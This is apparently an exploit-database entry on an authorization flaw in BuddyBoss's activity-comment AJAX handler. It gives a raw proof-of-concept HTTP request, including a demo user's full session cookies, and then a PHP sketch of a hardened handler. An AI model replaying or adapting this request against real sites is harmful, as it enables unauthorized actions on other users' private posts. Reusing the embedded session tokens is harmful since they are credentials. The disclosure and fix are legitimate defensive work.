## https://sploitus.com/exploit?id=WPEX-ID:76E8591F-120C-4CD7-B9A2-79F8D4D98AA8
```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: online-communities.demos.buddyboss.com
Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://online-communities.demos.buddyboss.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 195
Origin: https://online-communities.demos.buddyboss.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

scope=all&nonce=2081885524&action=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment_id=194628&form_id=194628&content=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass=
```

The vulnerability was identified in the `comment_id` and `form_id` parameters: the handler accepts whatever ids the client supplies, which allowed a private post to be commented on as another user.
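The defect is an object-level authorization gap: the `new_activity_comment` handler acts on a client-supplied `comment_id`/`form_id` without confirming that the requesting user is allowed to see the parent activity. The PHP sketch below is an added example, not BuddyBoss's own code, showing the shape of a hardened `wp_ajax_new_activity_comment` handler; `load_activity_by_id()`, `user_can_read_activity()` and `insert_activity_comment()` are hypothetical stand-ins for the plugin's lookup, visibility check and insert, and `$activity->parent_id` is an assumed field.

```php
<?php
// Added example (not BuddyBoss code): hardened AJAX handler for the
// new_activity_comment action seen in the request above.
add_action( 'wp_ajax_new_activity_comment', 'hardened_new_activity_comment' );

function hardened_new_activity_comment() {
    // 1. CSRF: the nonce field name matches the request body above.
    check_ajax_referer( 'new_activity_comment', '_wpnonce_new_activity_comment' );

    $user_id    = get_current_user_id();
    $comment_id = absint( $_POST['comment_id'] ?? 0 );
    $form_id    = absint( $_POST['form_id'] ?? 0 );
    $content    = wp_kses_post( wp_unslash( $_POST['content'] ?? '' ) );

    if ( ! $user_id || ! $comment_id || '' === trim( wp_strip_all_tags( $content ) ) ) {
        wp_send_json_error( array( 'message' => 'Invalid request.' ), 400 );
    }

    // 2. Object-level authorization: never trust the client-supplied id.
    //    Load the parent item server-side and check this user may read it.
    $activity = load_activity_by_id( $comment_id );                       // hypothetical lookup
    if ( ! $activity || ! user_can_read_activity( $activity, $user_id ) ) { // hypothetical check
        // Same response for "missing" and "forbidden" so ids cannot be enumerated.
        wp_send_json_error( array( 'message' => 'Not found.' ), 404 );
    }

    // 3. Consistency: form_id must refer to the same thread as comment_id,
    //    otherwise the two ids could be mixed to reach a different post.
    if ( $form_id && $form_id !== $comment_id && $form_id !== (int) $activity->parent_id ) {
        wp_send_json_error( array( 'message' => 'Mismatched ids.' ), 400 );
    }

    // 4. Only now write the comment, attributed to the authenticated user
    //    from the session, never to a user id taken from the request.
    $new_id = insert_activity_comment( $activity, $user_id, $content );   // hypothetical insert
    wp_send_json_success( array( 'id' => $new_id ) );
}
```

The check in step 2 is the one whose absence the request above exercises; the nonce in step 1 only proves the request came from the site's own page, not that the user may touch that post.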